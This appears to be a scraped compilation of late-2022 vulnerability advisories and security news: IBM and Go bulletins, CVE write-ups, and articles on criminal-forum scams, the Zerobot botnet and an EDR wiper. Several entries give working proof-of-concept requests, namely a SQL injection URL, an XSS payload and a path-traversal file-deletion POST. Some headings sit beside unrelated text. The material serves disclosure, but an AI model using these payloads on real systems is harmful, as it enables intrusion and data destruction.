Due to improper sanitization of user input on Windows, the static file handler allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read.

**Echo vulnerable to directory traversal**

High severity GitHub Reviewed Published Dec 7, 2022 • Updated Dec 7, 2022

GHSA-j453-hm5x-c46w: Echo vulnerable to directory traversal

IBM Content Navigator 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.0.9, 3.0.10, 3.0.11, and 3.0.12 is vulnerable to missing authorization and could allow an authenticated user to load external plugins and execute code. IBM X-Force ID: 238805.

**Security Bulletin**

  

**Summary**

IBM Content Navigator is vulnerable to missing authorization and could allow an authenticated user to load external plugins and execute code.

**Vulnerability Details**

**CVEID:**   CVE-2022-43581  
**DESCRIPTION:**   IBM Content Navigator is vulnerable to missing authorization and could allow an authenticated user to load external plugins and execute code.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238805 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)  
**

IBM Content Navigator

3.0.0 - 3.0.12

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

25 Oct 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU056","label":"Miscellaneous"},"Product":{"code":"SSEUEX","label":"IBM Content Navigator"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"},{"code":"PF035","label":"z\\/OS"}\],"Version":"3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.0.9, 3.0.10, 3.0.11, 3.0.12","Edition":"","Line of Business":{"code":"LOB18","label":"Miscellaneous LOB"}}\]

CVE-2022-43581: Security Bulletin: IBM Content Navigator is vulnerable to missing authorization.

On Windows, restricted files can be accessed via os.DirFS and http.Dir. The os.DirFS function and http.Dir type provide access to a tree of files rooted at a given directory. These functions permit access to Windows device files under that root. For example, os.DirFS("C:/tmp").Open("COM1") opens the COM1 device. Both os.DirFS and http.Dir only provide read-only filesystem access. In addition, on Windows, an os.DirFS for the directory (the root of the current drive) can permit a maliciously crafted path to escape from the drive and access any path on the system. With fix applied, the behavior of os.DirFS("") has changed. Previously, an empty root was treated equivalently to "/", so os.DirFS("").Open("tmp") would open the path "/tmp". This now returns an error.

Hello gophers,

We have just released Go versions 1.19.4 and 1.18.9, minor point releases.

These minor releases include 2 security fixes following the security policy:

*   os, net/http: avoid escapes from os.DirFS and http.Dir on Windows
    
    The os.DirFS function and http.Dir type provide access to a tree of files  
    rooted at a given directory. These functions permitted access to Windows  
    device files under that root. For example, os.DirFS("C:/tmp").Open("COM1")  
    would open the COM1 device.  
    Both os.DirFS and http.Dir only provide read-only filesystem access.
    
    In addition, on Windows, an os.DirFS for the directory \(the root of the  
    current drive) can permit a maliciously crafted path to escape from the  
    drive and access any path on the system.
    
    The behavior of os.DirFS("") has changed. Previously, an empty root was  
    treated equivalently to "/", so os.DirFS("").Open("tmp") would open the path "/tmp".  
    This now returns an error.
    
    This is CVE-2022-41720 and Go issue https://go.dev/issue/56694.
    
*   net/http: limit canonical header cache by bytes, not entries
    
    An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.
    
    HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
    
    This issue is also fixed in golang.org/x/net/http2 vX.Y.Z, for users manually configuring HTTP/2.
    
    Thanks to Josselin Costanzi for reporting this issue.
    
    This is CVE-2022-41717 and Go issue https://go.dev/issue/56350.
    

View the release notes for more information:  
https://go.dev/doc/devel/release#go1.19.4

You can download binary and source distributions from the Go website:  
https://go.dev/dl/

To compile from source using a Git clone, update to the release with  
git checkout go1.19.4 and build as usual.

Thanks to everyone who contributed to the releases.

Cheers,  
Jenny and Michael for the Go team

CVE-2022-41720: [security] Go 1.19.4 and Go 1.18.9 are released

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/view_service&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ep0ch

Login account: admin/admin123 (SuperAdmin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php 8.1 version

Vulnerability File: /php-sms/admin/services/view\_service.php

Vulnerability location: /php-sms/admin/?page=services/view\_service&id=

Vulnerability Parameter: id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/view\_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+

exp:

    GET /php-sms/admin/?page=services/view_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
    Host: 192.168.1.88
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
    Connection: close

CVE-2022-44393: vul_report/SQLi-1.md at main · Serces-X/vul_report

An issue was discovered in ZZCMS 2022. There is a cross-site scripting (XSS) vulnerability in admin/ad_list.php.

**ZZCMS the lastest version download page :**

http://www.zzcms.net/about/download.html

software link: http://www.zzcms.net/download/zzcms2022.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**Essential information**

version:2022  
File path:admin/ad\_list.php  
parameter:page  
request method:REQUEST  
payload:1");alert(/xss/);("

**Principle analysis**

admin/ad\_list.php line 17  
Get the parameter(page) through the REQUEST method and pass the parameter to the checkid () function.

inc/function.global.php line 14  
Let's see the checkid () function again. The content of the ID parameter comes from the page parameter obtained by the request method. The function first determines whether the ​ID is a number. If it is not a number, it executes the showmsg() function and passes the $ID to the showmsg() function.

inc/function.php line 23  
See the showmsg() function, in which line 24, you can execute malicious code by closing the alert() function  
for example：payload=");alert("1");("

**Loophole recurrence**

First log in to the website：http://localhost/admin/login.php

Access:http://localhost/admin/ad_list.php?page= ");alert(/xss/) ;(", and then two pop-up windows will pop up. The second pop-up content is the detection content.

CVE-2022-44361: ZZCMS2022 has a xss · Issue #1 · cri1stur/ZZcms

*   Why Go 
    *   Common problems companies solve with Go
        
    *   Stories about how and why companies use Go
        
    *   How Go can help keep you secure by default
        
*   Learn
*   Docs 
    *   Tips for writing clear, performant, and idiomatic Go code
        
    *   A complete introduction to building software with Go
        
    *   Reference documentation for Go's standard library
        
    *   Learn what's new in each Go release
        
*   Packages
*   Community 
    *   Videos from prior events
        
    *   Meet other local Go developers
        
    *   Learn and network with Go developers from around the world
        
    *   The Go project's official blog.
        
    *   Get help and stay informed from Go
        
    *   Get connected

CVE-2020-36565: GO-2021-0051 - Go Packages

On cybercrime forums, user complaints about being duped may accidentally expose their real identities.

Nobody is immune to being scammed online—not even the people running the scams. Cybercriminals using hacking forums to buy software exploits and stolen login details keep falling for cons and are getting ripped off thousands of dollars at a time, a new analysis has revealed. And what’s more, when the criminals complain that they are being scammed, they’re also leaving a trail of breadcrumbs of their own personal information that could reveal their real-world identities to police and investigators.

Hackers and cybercriminals often gather on specific forums and marketplaces to do business with each other. They can advertise upcoming work they need help with, sell databases of people’s stolen passwords and credit card information, or tout new security vulnerabilities that can be used to break into people’s devices or systems. However, these deals often don’t go to plan.

The new research, published today by cybersecurity firm Sophos, examines these failed transactions and the complaints people have made about them. “Scammers scamming scammers on criminal forums and marketplaces is much bigger than we originally thought it was,” says Matt Wixey, a researcher with Sophos X-Ops who studied the marketplaces.

Wixey examined three of the most prominent cybercrime forums: the Russian-language forums Exploit and XSS, plus the English-language BreachForums, which replaced RaidForums when it was seized by US law enforcement in April. While the sites operate in slightly different ways, they all have “arbitration” rooms where people who think they’ve been scammed or wronged by other criminals can complain. For instance, if someone purchases malware and it doesn’t work, they may moan to the site’s administrators.

The complaints sometimes lead to people getting their money back, but more often act as a warning for other users, Wixey says. In the past 12 months—the period the research covers—criminals on the forums have lost more than $2.5 million to other scammers, the analysis says. Some people complain about losing as little as $2, while the median scams on each of the sites ranges from $200 to $600, according to the research, which is being presented at the BlackHat Europe security conference.

The scams come in multiple forms. Some are simple, others are more sophisticated. Frequently, there are “rip-and-run” scams, Wixey says, where the buyer doesn’t pay for what they’ve received or the seller gets the money but doesn’t send across what they sold. (These are often known as “rippers.”) Other types of scams involve faked data or security exploits that don’t work: One person on BreachForums claimed a seller tried to send them Facebook data that was already public.

In one extreme incident on the Exploit forum, an account posted a lengthy complaint that they had provided someone with a Windows kernel exploit and hadn’t been paid the $130,000 they had agreed for it. The buyer said they would pay once they had tested the software but never stumped up the cash. “At each stage, he gave different excuses for delaying the payment,” a translated version of the complaint says. 

In some scams, multiple accounts or people appeared to work together, the research says. A user with a good reputation can introduce one person to another. This accomplice then directs the victim to a scam website. In one instance, Wixey says, a user wanted to buy a fake copy of the NFT-focused game _Axie Infinity_. “They wanted a fake copy of it with the intent of basically siphoning off legitimate user’s funds,” Wixey says. “They bought this fake copy from someone else, and the fake copy contained a backdoor which then stole the stolen cryptocurrency.” The scammer was essentially being scammed through their own scam.

While it shouldn’t be a surprise that criminals often try to con each other—there’s no honor among cybercriminals, after all—the research shows how prevalent it is. In 2017, security firm Digital Shadows pointed out a database that had been created to name and shame known rippers. Similarly, in 2021, the firm found that some administrators on cybercrime forums are scamming their own customers. In the past decade, there have been thousands of complaints about criminals scamming each other, according to threat intelligence firm Analyst1. Meanwhile, a previous analysis from TrendMicro concluded that while forums and marketplaces have rules, they don’t deter scammers. “The perpetrators are typically those who go for quick profits over reputation,” the firm’s 2019 research says.

Arguably, the most organized scam that Sophos’ Wixey spotted stemmed from an investigation into the Genesis marketplace, which has been online since 2017 and sells hotel login details, cookies, and access to data from compromised systems. When researching Genesis, Sophos discovered a faked version of the website appearing high in Google’s search results. “This is a really bizarre case,” Wixey says. “It was a really basic WordPress template and it asked for money, whereas the real Genesis is invitation only.”

As well as not looking like the official Genesis market, the faked version showed other weird behaviors: It linked out to another cybercrime website, the Bitcoin address people could make payments to changed when someone clicked the copy and paste button on the website, and it was also being advertised on Reddit. These signs, Wixey says, hinted the fake could be a “coordinated” effort. Armed with details from the fake Genesis website—including portions of the text and cryptocurrency addresses—the researchers discovered 20 websites that all appear to be connected and run by the same group or individual. The websites all look the same and were registered between August 2021 and June 2022—eight of them are still live. 

Almost all of these websites, Wixey says, imitate defunct criminal marketplaces and try to get people to pay to access them. The scam appears to work, too. The researcher says the Bitcoin addresses the scam sites pay into have collectively received $132,000, although he is cautious to say the money may all have come from the false websites. Sophos appeared to find one threat user who may be behind the sites—an actor going by the handle “waltcranston.” Among several pieces of information linking the handle to the sites, someone with the username claimed to have created the fake marketplaces on another forum.

Despite not being able to fully confirm that waltcranston is behind the network of fake sites, Wixey says that criminals complaining about being scammed and trying to resolve their disputes through arbitration can be a potential rich source of intelligence for investigators. 

Because those complaining about scams need to post evidence to back up their claims, they often share screenshots containing more personal information than they may have intended. Sophos says it saw a “treasure trove” of data, including cryptocurrency addresses, transaction IDs, email addresses, victims’ names, some malware source code, and other information. All these details may help to uncover more information about the people behind the usernames or provide clues about how they operate.

In one scamming complaint, a user shared a screenshot that showed someone’s Telegram usernames, email addresses, Jabber chat names, plus Skype and Discord usernames. In others, IP addresses and countries where users may be situated are displayed. Screenshots reveal the software people use, as well as the websites they visit and details about their computer setup. In some instances, Wixey saw details of victims that the cybercriminals had targeted.

Criminals, by the nature of what they’re doing, are usually very cautious about sharing anything that may identify them. Real names are not used; they often will use anonymization services such as Tor. “They typically employ pretty good operational security, but with scam reports, that’s not so much the case,” Wixey says. “So much of this stuff is just not available anywhere else on these marketplaces.” Going forward, the data could prove a useful tool for tracking down some of the criminals. “It’s certainly a starting point,” Wixey says.

Scammers Are Scamming Other Scammers Out of Millions of Dollars

The botnet exploits flaws in various routers, firewalls, network-attached storage, webcams, and other products and allows attackers to take over affected systems.

A new botnet is attacking organizations through various vulnerabilities in Internet of Things (IoT) devices from D-Link, Huawei, RealTek, TOTOLink, Zyxel, and more, posing a critical threat that allows attackers to take over vulnerable systems, researchers have found.

The botnet, dubbed Zerobot and written in the Go programming language, includes modules capable of self-replication and self-propagation, as well as attacks for different protocols, a researcher from Fortinet shared in a blog post published Dec. 6.

"Zerobot targets several vulnerabilities to gain access to a device and then downloads a script for further propagation," Fortinet Labs senior antivirus analyst Cara Lin wrote in the post.

So far, researchers have seen two versions of the botnet, one that they began tracking on Nov. 18 and a more sophisticated version that appeared soon after, on Nov. 24, that added a string of new capabilities.

The first version of Zerobot was quite basic, but attackers quickly updated it to include a "selfRepo" module that allows it to reproduce itself and infect more endpoints with different protocols or vulnerabilities, researchers said. The latest version — on which their analysis is based — also includes string obfuscation and a copy file module.

**Attack Mode**

Zerobot initiates an attack by first checking its connection to 1.1.1.1, the DNS resolver server from Cloudflare. It then copies itself onto the targeted device based on the victim's OS type, with different tactics depending on the platform, researchers said.

For Windows, Zerobot copies itself to the "Startup" folder with the filename "FireWall.exe." If the targeted platform is Linux, it has three file paths — "HOME%," "/etc/init/," and "/lib/systemd/system/."

Once it is copied onto the targeted device, Zerobot then sets up an "AntiKill" module to prevent users from disrupting its program once it's started. "This module monitors a particular hex value and uses 'signal.Notify' to intercept any signal sent to terminate or kill the process," Lin wrote.

After initialization, Zerobot starts a connection to its command-and-control (C2) server, ws\[:\]//176\[.\]65\[.\]137\[.\]5/handle, using the WebSocket protocol.

Once it sets up a communication channel, the client waits for a command from the server to unleash any of 21 exploits for various vulnerabilities found in IoT products, as well as some others — including the Java framework vulnerability Spring4Shell, phpAdmin, and F5 Big — "to increase its success rate," Lin wrote.

**Enterprises: Take Immediate Action**

Fortinet included a list of the numerous vulnerabilities that Zerobot exploits, which are found in assorted devices including routers, webcams, network attached storage, firewalls, and other products from a host of well-known manufacturers. 

Lin advised any organization using these devices to update to the latest versions or apply any available patches immediately. Indeed, with businesses losing up to $250 million a year on unwanted botnet attacks, according to a report published last year from Netacea, organizations would be wise to evaluate their environments to discover any device that might be vulnerable to Zerobot, she noted.

"Users should be aware of this new threat, patch any affected systems … running on their network, and actively apply patches as they become available," Lin wrote.

Zerobot Weaponizes Numerous Flaws in Slew of IoT Devices

Microsoft, three others release patches to fix a vulnerability in their respective products that enables such manipulation. Other EDR products potentially are affected as well.

Many trusted endpoint detection and response (EDR) technologies may have a vulnerability in them that gives attackers a way to manipulate the products into erasing virtually any data on installed systems.

Or Yair, a security researcher at SafeBreach who discovered the issue, tested 11 EDR tools from different vendors and found six — from a total of four vendors — were vulnerable. The vulnerable products were Microsoft Windows Defender, Windows Defender for Endpoint, TrendMicro ApexOne, Avast Antivirus, AVG Antivirus, and SentinelOne.

**Formal CVEs and Patches**

Three of the vendors have assigned formal CVE numbers for the bugs and issued patches for them prior to Yair disclosing the issue at the Black Hat Europe conference on Wednesday, Dec 7.

At Black Hat, Yair released proof-of-concept code dubbed Aikido that he developed to demonstrate how a wiper, with just the permissions of an unprivileged user, could manipulate a vulnerable EDR into wiping almost any file on the system, including system files. "We were able to exploit these vulnerabilities in more than 50% of the EDR and AV products we tested, including the default endpoint protection product on Windows," Yair said in a description of his Black Hat talk. "We are lucky to have this discovered prior to real attackers, as these tools and vulnerabilities could have done a lot of damage falling in the wrong hands." He described the wiper as likely being effective against hundreds of millions of endpoints running EDR versions vulnerable to the exploit.

In comments to Dark Reading, Yair says he reported the vulnerability to the affected vendors between July and August. "We then worked closely with them over the next several months on the creation of a fix prior to this publication," he says. "Three of the vendors released new versions of their software or patches to address this vulnerability." He identifies the three vendors as Microsoft, TrendMicro and Gen, the maker of the Avast and AVG products. "As of today, we have not yet received confirmation from SentinelOne about whether they have officially released a fix," he says.

Yair describes the vulnerability as having to do with how some EDR tools delete malicious files. "There are two crucial events in this process of deletion," he says. "There is the time the EDR detects a file as malicious and the time when the file is actually deleted," which sometimes can require a system reboot. Yair says he discovered that between these two events an attacker has the opportunity to use what are known as NTFS junction points to direct the EDR to delete a different file than the one that it identified as malicious.

NTFS junctions points are similar to so-called symbolic links, which are shortcut files to folders and files located elsewhere on a system, except that junctions are used to link directories on different local volumes on a system.

**Triggering the Issue**

Yair says that to trigger the issue on vulnerable systems he first created a malicious file — using the permissions of an unprivileged user — so the EDR would detect and attempt to delete the file. He then found a way to force the EDR to postpone deletion until after reboot, by keeping the malicious file open. His next step was to create a C:\\TEMP\\ directory on the system, make it a junction to a different directory, and rig things so that when the EDR product attempted to delete the malicious file — after reboot — it followed a path to a different file altogether. Yair found he could use the same trick to delete multiple files in different places on a computer by creating one directory shortcut and putting specially crafted paths to targeted files within it, for the EDR product to follow.

Yair says that with some of the tested EDR products, he was not able to do arbitrary file deletion but was able to delete entire folders instead.

The vulnerability affects EDR tools that postpone deletion of malicious files till after a system reboots. In these instances, the EDR product stores the path to the malicious file in some location — that varies by vendor — and uses the path to delete the file after rebooting. Yair says some EDR products don't check if the path to the malicious file leads to the same place after reboot, giving attackers a way to stick a sudden shortcut in the middle of the path. Such vulnerabilities fall into a class known as Time of Check Time of Use (TOCTOU) vulnerabilities, he notes.

Yair says that in most cases, organizations can recover deleted files. So, getting an EDR to delete files on a system by itself, while bad, isn't the worst case. "A deletion is not exactly a wipe," Yair says. To achieve that, Yair designed Aikido so it would overwrite files it had deleted, making them unrecoverable as well.

He says the exploit he developed is an example of an adversary using an opponent's strength against them — just as with the Aikido martial art. Security products, such as EDR tools have super-user rights on systems, and an adversary that is able to abuse them can execute attacks in a virtually undetectable manner. He likens the approach to an adversary turning Israel's famed Iron Dome missile defense system into an attack vector instead.

For Cyberattackers, Popular EDR Tools Can Turn into Destructive Data Wipers

Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.

Hi,

I was looking at the fix to #1035:  

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.  
Thus, it's possible to delete any file outside application's webroot:  

POC request:

    POST /api/delete-resource?provider= HTTP/1.1
    Host: localhost:8008
    Content-Length: 363
    sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Content-Type: text/plain;charset=UTF-8
    Accept: */*
    Origin: http://localhost:8008
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:8008/resources
    Accept-Encoding: gzip, deflate
    Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
    Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
    Connection: close
    
    {"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}

Tag

#windows